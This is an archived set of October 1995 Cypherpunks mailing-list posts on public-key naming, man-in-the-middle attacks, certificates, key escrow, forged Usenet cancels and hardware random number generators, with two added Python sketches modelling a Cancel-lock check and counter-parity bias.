I think Carl's point is that when you write an e-mail to Carl, you 
probably don't care that it reaches the "real" Carl Ellison, because you 
don't have a binding between the name "Carl Ellison" and the physical 
person.  A binding between a name and a key is useless if there is no 
binding between the name and the person.  Since this is the case, why not 
forget about the binding between the name and the key (or turn it into a 
local one as I suggested in the previous post) and go straight to the 
binding between the key and the person?

On the other hand, if you do have a binding between the name and the 
person, then most likely you met Carl at some point in the past and he 
told you his name was Carl Ellison.  In that case it would have been just 
as easy for him to give you his public key instead.

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Man In Black <mib@io.com>
Date: Thu, 5 Oct 95 16:05:50 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Digestable
Message-ID: <Pine.BSI.3.91.951005180218.7621A-100000@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


Would whoever posted information on a free cypherpunks digest please 
repost?  Thanks.

=]=




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Thu, 5 Oct 95 17:12:06 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: Re: NSA Realists v. Nuts (Was: Re: Crypto APIs)
Message-ID: <30747427@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Perry E. Metzger wrote:

>The real problem with the NSA is the same as the problem with the FBI
>re: digital telephony. They've gotten used to a certain model of how
>the world works and rather than adapt to new times where most people
>have access to strong crypto, they have decided to use the laws to try
>to retard the inevitable.

Perry is absolutely right about this.  We have been living in a "golden era" 
for the FBI and NSA.  By analogy, we have also been living in a golden era 
for physicians:  during the last several decades (in the developed world 
anyway) we have relied on antibiotics to the point where they are taken for 
granted.  This time has passed, and there is no going back.  The Golden Age 
of Antibiotics is over.

Similarly, the Golden Age of Wiretaps is over.  No amount of wishful 
thinking and convoluted logic can put the genie back into the bottle.  An 
attempt to (in effect) make certain types of mathematics illegal will only 
serve to knock us out of our technological leadership position, not make our 
country safe from terrorism and drugs.  Given a world in which strong crypto 
is actually used, and that use is illegal, how can a government make the 
punishment fit the crime?  Would all use of illegal cryptography be treated 
as though there was an actual threat of terrorism?  The death penalty?  This 
is, of course, an absurd point of view.  The government could no more 
accomplish this than they could make muttering over the phone (thereby 
defeating a plaintext wiretap), or the use of obscure language (such as 
Native American dialects) illegal.  It just doesn't hang together as a 
rational approach.

Like physicians, the FBI and the national security operations must devise 
alternative schemes to combat the real "enemy," terrorists and drug dealers 
 -- not mathematicians and ordinary citizens trying to have a private 
conversation.  The suppression of basic rights that would be required in any 
attempt to overcome the "force of nature" that is human knowledge would make 
a mockery of our "inalienable rights" as free people to conduct our lives 
without fear of the overbearing scrutiny of unrestrained government.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gerdw@cougar.vut.edu.au (David Gerard)
Date: Thu, 5 Oct 95 02:25:38 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
In-Reply-To: <6FBccD15w165w@bwalk.dm.com>
Message-ID: <45040d$8cd@cougar.vut.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 04 Oct 95 10:47:30 EDT, Dr. Dimitri Vulis (dlv@bwalk.dm.com) wrote:
:[alt.religion.scientology restored, since that's where most of the discussion
:of forged cancels has been taking place so far ]

[snip snip snip]

:When an article is posted, two quantities are computed by the posting program:
:M1 = H(article body + newsgroups + message-id + date + passphrase) and
:M2 = H(M1). The posted article contains the header "Cancel-lock: M2".
:When an attempt is made to cancel/supersede an article X with a "Cancel-lock:"
:header, the user is asked to supply the passphrase. The posting software
:computes M1 = H(X's body + newsgroups + X's message-id + date + passphrase)
:once again and adds the "Cancel-key: M1" header to the article containing
:"Control: cancel <X>" or "Supersedes: <X>" that's being posted.
:(Note that without knowing the passphrase it's intractable to match the M1.)
:Whenever news server software (such as inn) detects either "Control: cancel
:<X>" or "Supersedes: <X>", INN should retrieve the original article <X> and
:look for the "Cancel-lock: M2" header. If one is found, then the old article
:may be cancelled only if the new article contains the header "Cancel-key: M1"
:such that H(M1) = M2.



One thing that occurs to me: suppose I go to control, collect cancel messages,
and build myself a collection of M1's that will work with a given M2?

That is, I can't actually invert the hashing function. But if a given
hash function is standard, then I can eventually build up a collection of
M1s for M2s that will let me cancel quite a few things I may want to.
How many cancel messages come through in a day?



--
Reverend Doctor David Gerard, KoX, SP 4.03 (awaiting verification of SP 5)
Prestige Elite(tm) Research Church of the SubGenius
"Servicing the Prestige Elite(tm) since 1985!"
OK, clams. You want war? You've got war.
--
Please email ALL followups (crappy and thoroughly dysfunctional newsfeed).
Personal visits from Scientologists will be greeted with extreme hostility
  and the vigilant attention of VUT Security, but personal physical violence
  *only* when appropriate, legal and called-for.
gerdw@cougar.vut.edu.au (preferred); fun@suburbia.apana.org.au
July 5, 1998, 7 AM. Saucers. End of the world. Your US$30 is your trip ticket.
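
A sketch of the Cancel-lock / Cancel-key check quoted in the message above, added here as an example; it is not part of the original post and is not INN code. SHA-256 standing in for H, the length-prefixed field encoding, the `Spool` class and the sample articles are all assumptions. It checks how a Cancel-key observed in one cancel message fares against the lock on a different article.

```python
import hashlib
import hmac


def H(data: bytes) -> str:
    """Stand-in for the unspecified hash H (assumption: SHA-256)."""
    return hashlib.sha256(data).hexdigest()


def cancel_key(article: dict, passphrase: str) -> str:
    """M1 = H(body + newsgroups + message-id + date + passphrase)."""
    fields = (article["body"], article["newsgroups"],
              article["message_id"], article["date"], passphrase)
    material = b""
    for field in fields:
        raw = field.encode("utf-8")
        # Length prefix (assumption): keeps the field boundaries unambiguous.
        material += len(raw).to_bytes(4, "big") + raw
    return H(material)


def cancel_lock(article: dict, passphrase: str) -> str:
    """M2 = H(M1); this is the value published as 'Cancel-lock: M2'."""
    return H(cancel_key(article, passphrase).encode("utf-8"))


def post(article: dict, passphrase: str) -> dict:
    """Return a copy of the article carrying its Cancel-lock header."""
    posted = dict(article)
    posted["cancel_lock"] = cancel_lock(article, passphrase)
    return posted


class Spool:
    """Hypothetical news spool that applies the check on cancel/supersede."""

    def __init__(self):
        self.articles = {}

    def store(self, article: dict) -> None:
        self.articles[article["message_id"]] = article

    def accept_cancel(self, target_id: str, key=None) -> bool:
        target = self.articles.get(target_id)
        if target is None:
            return False  # nothing left to cancel
        lock = target.get("cancel_lock")
        # The quoted scheme only constrains articles that carry a lock.
        if lock is not None:
            if key is None:
                return False
            if not hmac.compare_digest(H(key.encode("utf-8")), lock):
                return False
        del self.articles[target_id]
        return True


# Constructed sample articles: same author, same passphrase.
SAMPLE_A = {"message_id": "<a1@example.invalid>", "newsgroups": "misc.test",
            "date": "Wed, 04 Oct 95 10:00:00 GMT", "body": "first article"}
SAMPLE_B = {"message_id": "<b2@example.invalid>", "newsgroups": "misc.test",
            "date": "Wed, 04 Oct 95 11:00:00 GMT", "body": "second article"}


def demo() -> dict:
    spool = Spool()
    spool.store(post(SAMPLE_A, "correct horse"))
    spool.store(post(SAMPLE_B, "correct horse"))
    # The key the author would publish in a cancel for article A.
    key_a = cancel_key(SAMPLE_A, "correct horse")
    results = {}
    # M1 covers the message-id, body and date, so A's key does not open B.
    results["key_a_on_article_b"] = spool.accept_cancel(SAMPLE_B["message_id"], key_a)
    results["key_a_on_article_a"] = spool.accept_cancel(SAMPLE_A["message_id"], key_a)
    # Once A is gone, the published key has nothing left to act on.
    results["replayed_key_a"] = spool.accept_cancel(SAMPLE_A["message_id"], key_a)
    results["wrong_passphrase_on_b"] = spool.accept_cancel(
        SAMPLE_B["message_id"], cancel_key(SAMPLE_B, "guess"))
    results["right_passphrase_on_b"] = spool.accept_cancel(
        SAMPLE_B["message_id"], cancel_key(SAMPLE_B, "correct horse"))
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```
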




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 5 Oct 95 18:22:27 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
Message-ID: <199510060121.SAA25213@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai <weidai@eskimo.com> writes:

>In this scheme, the man-in-the-middle problem goes away because you are 
>no longer trying to communicate with a True Name, whose binding with a 
>key can be spoofed, but rather with the key itself.  If the holder of 
>that key chooses to act as a middle-man by relaying messages around, that 
>is his business, and there is really nothing you can do about it.

Carl Ellison has been arguing a similar point for some time, if I
understand him, which I may not!

The man in the middle problem is a difficult one, but I don't think
you're going to get away with defining the problem out of existence.
There is a difference between a MITM and the case you describe where you
are actually communicating securely with the person you think you are,
but he chooses to relay the messages around.  The difference is that if
you are actually communicating securely with an individual, you can form
some estimate of his personality, judgement, etc.  You may choose on this
basis to trust him, provide sensitive information, take risks, and so on.
But if he is actually behind a MITM then all bets are off.  All of your
judgement about him is irrelevant.  At any time the MITM can take
advantage of the information you provide.  He can even "blow his cover"
and take extreme action, to your detriment.

This situation with the MITM is actually about the same as if you were
communicating insecurely in the first place.  You are exposed to all of
the same risks.
So if you are willing to accept communicating systems that allow this
kind of attack, you almost might as well not use cryptography at all.
(Not quite, because the MITM is a more expensive attack to mount than one
on an unsecured wire.)

In fact, I can facetiously prove that cryptography is unnecessary.  We
are not communicating with individuals, but with communicatees.  All of
your messages are by definition going to the communicatee with whom you
are communicating.  If the particular communicatee who is receiving
your message chooses to relay it or spread the information around in
other ways, that is the right and privilege of the communicatee.  But
messages are going to the communicatee they are going to, whether
encryption is used or not.  So encryption is not necessary.

This argument seems to mirror the one for why we only communicate with
keys, that if a key wants to do something nasty we can't stop it (him?),
etc.  I say, we don't communicate with keys.  We communicate with people
(or occasionally programs).

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael J Gebis <gebis@ecn.purdue.edu>
Date: Thu, 5 Oct 95 16:38:42 PDT
To: cypherpunks@toad.com
Subject: Re: SSL telnet vs. SSH. Comparison?
In-Reply-To: <199510051751.NAA03127@book.hks.net>
Message-ID: <199510052338.SAA02892@purcell.ecn.purdue.edu>
MIME-Version: 1.0
Content-Type: text


> Would somebody please compare for me SSL telnet vs. SSH in terms of
> security, advantages, and disadvantages?
> 
I'm not answering your question, but if people are looking for secure
telnet implementations, here's a list that I saved from a while back.
It's a bit obsolete (for example, I think ssh is on version 1.2.0 now)
but it will get people started.

I've been using ssh for a while, and it's the ultimate in convenience.
If you haven't tried it, give it a look.  (I make no claims about the
security; hopefully, someone on the list will take a look and do an
in-depth analysis. :)

###BEGIN INCLUDED FILE###
Thanks to everyone who responded to my posting regarding a `secure
telnet' implementation:

    Is there a (possibly free) implementation of something like a
    "secure telnet"?  I'm looking for a way to login into a remote
    system providing secure interactive communication between the two
    hosts over (possibly insecure) Internet connections.

Here's a summary of the implementations I am now aware of:


* SSL

There is a free implementation of Netscape's SSL Protocol (Secure
Socket Layer) by Eric Young named "SSLeay"
<ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/>.  Eric Young is also the
author of a popular DES Library.
<ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/>

SSL provides a secure authentication and encryption basis on top of
which application protocols like telnet, ftp, and http may be
transparently added <http://home.netscape.com/info/SSL.html>.
However, the RC4 encryption using a 40 bit key, which is employed by
SSL, has recently been cracked with a brute force attack, see
RISKS-17.27 <http://catless.ncl.ac.uk/Risks/17.27.html#subj1>.

A modified version of telnet that uses SSL-based authentication and
encryption is also available
<ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps/>.


* Deslogin

Deslogin by Dave Barrett <barrett@asgard.cs.colorado.edu> provides a
network login service much like rlogin/rlogind.  Deslogin uses a
`challenge-response' protocol to authenticate users.  Also, all data
transmitted to and from the remote host is encrypted using the DES.
Deslogin also includes a command-line program `cipher' for fast DES
encryption. <ftp://ftp.uu.net/pub/security/des/>


* SRA Telnet 

This is a version of the SRA Telnet modified by the Technical
University of Chemnitz.  A session key is negotiated using an
uncertified Diffie-Hellman-Method and used for the encryption of UID
and password.  The complete session text is encrypted with DES in CFB
mode. <ftp://ftp.tu-chemnitz.de/pub/Local/informatik/sec_tel_ftp>


* Ssh

Ssh (Secure Shell) is a program to log into another computer over a
network, to execute commands in a remote machine, and to move files
from one machine to another.  It provides strong authentication and
secure communications over insecure channels.  Among other features,
Ssh is a complete replacement for rlogin, rsh, and
rcp. <ftp://ftp.funet.fi/pub/unix/security/ssh-1.0.0.tar.gz>


* Skey

Bell Canada's `skey' free-ware implements a one-time password system,
so that sniffers can get your ID and PW, but can't use the PW next
time. <ftp://ftp.cert.dfn.de/pub/tools/password/SKey/>


----------------------------------------------------------------------
I provide this information in the hope that it will be useful, but
with no claim of either completeness or correctness.  Thanks again to
all who contributed to compile the above information.

-- 
    Jochen Schwarze
    <jochen.schwarze@studbox.uni-stuttgart.de>

###END INCLUDED FILE###
-- 
Mike Gebis  gebis@ecn.purdue.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 5 Oct 95 19:02:38 PDT
To: cypherpunks
Subject: The Intelligence community -- some interesting web pages
Message-ID: <9510060202.AA05514@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I particularly liked the NSA surrogate home page under the second URL. --John

From: farber@central.cis.upenn.edu (David Farber)

Try looking at

http://www.awpi.com/IntelWeb/ -- IntelWeb - The WWW Site of
Intelligence Watch Report (IWR)

and

http://www.fas.org/pub/gen/fas/irp/ -- Project on
Intelligence Reform, Federation of American Scientists





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 5 Oct 95 17:12:40 PDT
To: cypherpunks@toad.com
Subject: Re: NetManage & Cylink Crypto
Message-ID: <9510060012.AA02236@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
>  The link with Cylink will allow NetManage to license and include
>  the Cylink public key encryption technology in its applications
>  with a variety of ciphering systems to be used in the NetManage
>  suite, including: DES, Triple DES, Safer, IDEA, Skipjack, RC-2,
                                                   ^^^^^^^^
>  and RC-4.

Hey, this is interesting...  will Skipjack be included in future NetManage  
products or is this press-release only mentioning Skipjack as an example of a  
possible encryption algorithm for use with NetManage?


andrew
"Gentlemen, start your disassemblers."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Oct 95 19:01:59 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates, Attributes, Web of Trust
Message-ID: <ac99d8e3240210043452@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:11 PM 10/5/95, Jeff Weinstein wrote:

>  How about if the systems allows you to get a certificate that
>has any name in it that you want, where the issuer makes no
>claims about the identity of the owner of the certificate?
>How about if the software lets the user decide which CAs they
>will accept certificates from?  Given these two features,
>would you still consider requiring a certificate to be bad?

Let's make sure what we mean by these two points:

1. "...allows you to get a certificate that has any name in it that you
want, where the issuer makes no claims about the identity of the owner of
the certificate?"

I would expect that a certificate for "%63rrW209neU6q!" would be issuable
for a minuscule amount of money, and as many of these as are desired.

(No, I'm not saying "Verisign" must offer certificates for very low cost,
only that there be no built-in costs, or built-in time delays and
processing delays, that would prevent "Tim's Really Cheap and No Questions
Asked Certificate Service" from issuing such certificates, cheaply and
rapidly (in seconds, or less, as some applications will need this, if other
services "demand" certificates).)

2. "...software lets the user decide which CAs they will accept
certificates from?"

Fine, provided the following CAs are acceptable:

-- an "automatic" certificate granter, essentially meant only to satisfy
protocols which require certificates

-- a certifier for the Mob, which sells certificates for some fee

-- the application itself should be able to generate certificates
immediately...call this the "null certification."

It is true that some of these examples seem to "undermine" the whole purpose
of certificates, but this is precisely my point: if I want a key to be
certified, I will determine the conditions under which I want it to be
certified. Other parties are free to meet my conditions if they wish to do
business with me, or not, as the case may be.

The "null certification" is thus very important.

Naturally, I think this null certification makes the idea of _requiring_
certification moot.

Will Netscape allow this?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 5 Oct 95 19:25:24 PDT
To: cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
Message-ID: <ac9a42dc01021004b46d@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero writes:
....
> What about a beam of high intensity ionising radiation aimed at the
> detector?
....
You presumably use the oddness of the count for your random bit in some
predetermined time interval. External radiation can change, but not bias
the parity. If the counter saturates, the counter may be biased towards one
parity but the software can easily detect saturation presuming it gets the
count.

You can use the source in a smoke detector.
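
The parity argument above, worked numerically as an added example (not part of the original message): it assumes detector events in one interval are Poisson-distributed with mean `lam` and that the counter sticks at `cap` when it saturates instead of wrapping. Both are modelling assumptions, as are the function names and the sample counts.

```python
import math


def poisson_pmf(k: int, lam: float) -> float:
    """P(count == k) for a Poisson source with mean lam per interval."""
    return math.exp(-lam + k * math.log(lam) - math.lgamma(k + 1))


def p_saturated(lam: float, cap: int) -> float:
    """Probability that an interval's true count reaches or exceeds cap."""
    below = math.fsum(poisson_pmf(k, lam) for k in range(cap))
    return max(0.0, 1.0 - below)


def p_odd(lam: float, cap=None) -> float:
    """Probability that the reported count is odd.

    Without a cap: P(even) - P(odd) = sum((-lam)^k e^-lam / k!) = e^(-2 lam),
    so P(odd) = (1 - e^(-2 lam)) / 2.  A higher event rate only moves this
    closer to 1/2.  With a cap, every saturated interval reports `cap`, so
    all of that probability mass lands on the parity of `cap`.
    """
    if cap is None:
        return (1.0 - math.exp(-2.0 * lam)) / 2.0
    below = [poisson_pmf(k, lam) for k in range(cap)]
    odd_mass = math.fsum(below[1::2])
    saturated = max(0.0, 1.0 - math.fsum(below))
    return odd_mass + (saturated if cap % 2 else 0.0)


def bits_from_counts(counts, cap: int):
    """Take one parity bit per interval, dropping saturated intervals.

    Returns (bits, dropped) so the caller can alarm on a high drop rate.
    """
    bits, dropped = [], 0
    for count in counts:
        if count >= cap:
            dropped += 1  # counter pegged: this reading carries no parity
            continue
        bits.append(count & 1)
    return bits, dropped


if __name__ == "__main__":
    cap = 255  # assumed 8-bit counter that sticks at its maximum
    for lam in (0.5, 5.0, 50.0, 400.0):
        print(f"lam={lam:6.1f}  P(odd)={p_odd(lam, cap):.6f}  "
              f"P(saturated)={p_saturated(lam, cap):.3e}")
    # Constructed sample readings; two intervals are pegged at the cap.
    print(bits_from_counts([3, 8, 255, 10, 255, 7], cap))
```
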






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Oct 95 19:17:04 PDT
To: cypherpunks@toad.com
Subject: Insiders vs. Outsiders...a Nice Metaphor
Message-ID: <ac99ded12502100498ea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:03 PM 10/5/95, Carl Ellison wrote:

>Crypto is used for making sure that insiders get in while outsiders are
>kept out of encrypted files/messages.
>
>Strong crypto does a better job of keeping outsiders out.
>
>Things like TIS CKE are mechanisms for making sure that insiders continue
>to get in, in spite of mishaps with their keys.
>
>
>Any such system can be evaluated on its technical merits (does it really
>separate the insiders from the outsiders as well as it claims to?) (does it
>survive various disasters (because if it doesn't survive, it can't keep
>insiders in)?)
>
>
>This is a separate topic from GAK -- which boils down to the Government's
>claim that it should be listed as an insider for everybody.
>
>
>That's what needs to be brought to everyone's attention.


This is a very nice metaphor for what is going on.

It also touches on some of the issues about key certification. The issue of
who a person is has nothing to do directly with whether they are an
"insider" or an "outsider."

(In fact, who a person "really is" is almost beside the point.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 5 Oct 95 17:52:22 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: subjective names and MITM
In-Reply-To: <199510060021.UAA02958@homeport.org>
Message-ID: <199510060051.UAA04613@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
>	Just a minor nit regarding a well thought out post, public
>keys are not 'global' ids, but 'system-wide' IDs.  For keys to be
>really global, there needs to be a mechanism in place for insuring
>that key ids are very probably unique.  One way to ensure that keys
>are globally unique would be to integrate a KCA identifier with the
>keyid, and KCAs base part of their reputation on not signing multiple
>keys with the same id.

A public key *is* "very probably unique".  A "randomly selected" 1024 bit
prime number has a specific amount of entropy in it.  The likelihood of
two users world wide "randomly" choosing the same such prime may be
precisely determined (assuming you can figure the entropy).

Who needs a KCA to certify it?

The real benefit of the KCA is as a means of linking the key with a unique
person.  As I've commented before, anonyms have no meaningful "credit rating".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Thu, 5 Oct 95 19:35:22 PDT
To: cypherpunks@toad.com
Subject: Re: GC Tech GlobeID pilot
Message-ID: <199510060253.TAA28173@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain



>        http://globeid.gctech.fr/cgi-gid/welcome?Language=English

>Sorry again, but because real content is and will be available
>we committed to deliver only a few hundreds Web Wallets for this
>pilot. You can still use the web form to apply for one...

Except for this clause...

| Caution: Following form is provided for demonstration purpose only. 

| If you really want to participate to the Globe ID electronic wallet pilot 
| program, please contact Mr. Pierre Edelman or GID95@GCTech.fr. 

On the surface, this doesn't look much different than First Virtual or any
of the myriad other "let me hold your credit card number for you" sites.
--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node)   edge@you.got.net
                  "Shoot the Fruit Loop"               408.469.9400
 
"On the Information Superhighway,
  I'm the guy behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jms@tennis.opus1.com (It's like a network, only different)
Date: Thu, 5 Oct 95 23:29:27 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
In-Reply-To: <modemacDFr0qB.IyK@netcom.com>
Message-ID: <1995Oct5.200410.306@tennis.opus1.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <V0BgcD4w165w@bwalk.dm.com>, dlv@bwalk.dm.com (Dr. Dimitri
Vulis) writes:

> I'd like to remind everyone of the well-thought-out scheme for authenticating
> cancels proposed some time ago by Taneli Hujskonen and Benjamin Franz, that can
> also be integrated into a Lazarus-like system for tracing forged cancels.

Maybe.  On the other hand, there's nothing to keep certain well-connected
news administrators from removing the appropriate header line, or, even
more interestingly, substituting values such that the cancel equation
is well known.

Fundamentally, though, what I've discovered is that any significant change
to the news system is impossible to do, because installed base restricts
what people are willing to change.  Look at the dozens of extensions to
NNTP which all conflict, are non-standard or ill-described, yet are
demanded by moronic software such as Netscape's news reader.  When will
we see NNTP v3?  Never...

jms

Joel M Snyder, PhD, 1404 E Lind Rd, Tucson, AZ, 85719
Phone: +1 520 324 0494 (voice)  +1 520 324 0495 (FAX)  
jms@Opus1.COM    http://www.opus1.com/jms    Opus One

PLEASE NOTE: The useful parts of Arizona changed 
from area code 602 to area code 520 on March 20, 1995.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Oct 95 19:54:05 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
Message-ID: <ac99e72b260210048f1f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:51 AM 10/6/95, Scott Brickner wrote:
>A public key *is* "very probably unique".  A "randomly selected" 1024 bit
>prime number has a specific amount of entropy in it.  The likelihood of
>two users world wide "randomly" choosing the same such prime may be
>precisely determined (assuming you can figure the entropy).
>
>Who needs a KCA to certify it?
>
>The real benefit of the KCA is as a means of linking the key with a unique
>person.  As I've commented before, anonyms have no meaningful "credit rating".

If I understand your usage of "anonym" correctly, I think you are clearly wrong.

An anonymous agent who has no persistence (no past history, no continuing
history, no expectation by others of future history) probably has no credit
rating, no "reputation."

However, an anonymous agent _with_ a persistent presence can have a credit
rating or reputation. Many examples of this, e.g., Pr0duct Cypher, Black
Unicorn, S. Boxx, and others.

The "linking with a unique person" is not especially important, IMO.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 5 Oct 95 17:18:56 PDT
To: weidai@eskimo.com (Wei Dai)
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
Message-ID: <199510060021.UAA02958@homeport.org>
MIME-Version: 1.0
Content-Type: text


Wei Dai wrote:

| Perhaps it is better to think of names as subjective identifiers, and
| public keys as global ids.  That is, a person who has a collection of
| public keys gives each of them a name, but different people can name their
| keys differently.  Of course the holder of the corresponding private key
| can help in the naming process (e.g., "Please call me Wei").  If two
| people need to talk about a third party, they can refer to him by an
| arbitrary name after establishing a common binding between his key and
| that name. 

	Just a minor nit regarding a well thought out post, public
keys are not 'global' ids, but 'system-wide' IDs.  For keys to be
really global, there needs to be a mechanism in place for insuring
that key ids are very probably unique.  One way to ensure that keys
are globally unique would be to integrate a KCA identifier with the
keyid, and KCAs base part of their reputation on not signing multiple
keys with the same id.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 5 Oct 95 17:32:26 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Certificate proposal
In-Reply-To: <3074646C.2418@netscape.com>
Message-ID: <199510060035.UAA02995@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jeff Weinstein wrote:

|   I think the old idea of a certificate just binding a name and
| a key is turning out to not be very useful.  That is why Netscape
| Navigator 2.0 will support x509 version 3 certificates.  They allow
| arbitrary attributes to be signed into a certificate.  In this new
| world, you can think of a certificate as a way of binding a key with
| various arbitrary attributes, one of which may be(but is not
| required to be) a name.

	I'm a bit behind on the X.509 discussion, but does version 3
resist the attack Ross Anderson mentions in his 'Robustness Principles'
paper in Crypto '95?

	(The paper can be found in
ftp.cl.cam.ac.uk:/users/rja14/robustness.ps.Z  The wcf.ps.Z is his
'Why Cryptosystems Fail' paper, and both are well worth reading.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 5 Oct 95 17:45:57 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Rethinking the utility of netnews "cancel" control messages
Message-ID: <9510060045.AA17061@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Look just replace "cancel" with "mark as worthless and sign".  Then 

No.

Replace cancel with
	1.  Legal wants you to destroy this document
	2.  The site security officer wants you to destroy the document
	3.  The license has expired and you must destroy the document
and so on.  I don't think my life has been all that interesting, but
I've had all of those things happen.

Of course there is no guarantee that individuals don't have private
copies, etc., but you have this situation currently and it works.
Replacing cancel with setaside makes Usenet architecture useful for
many business semantics/requirements.  That's not something I'm willing to
trade away and I am surprised that others would...

	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Thu, 5 Oct 95 20:59:01 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <199510060358.UAA03869@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DG06FE.IA8@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:

> OK, so suppose I want to send my credit card number to Egghead Software.
> I get one of these new-fangled certificates from somebody, in which
> VeriSign has certified that key 0x12345678 has hash 0x54321.  I think we
> can agree that by itself this is not useful.  So, it will also bind in
> some attribute.  What will that attribute be?

Um, just a wild guess, but... your credit card number maybe?  (Well,
okay, its hash.)

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 5 Oct 95 18:08:42 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Rethinking the utility of netnews "cancel" control messages
Message-ID: <9510060107.AA17155@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Sigh.

>Replacing cancel with setaside makes Usenet architecture useful for
>many business semantics/requirements.  That's not something I'm willing to

Sigh.  useLESS for many ...




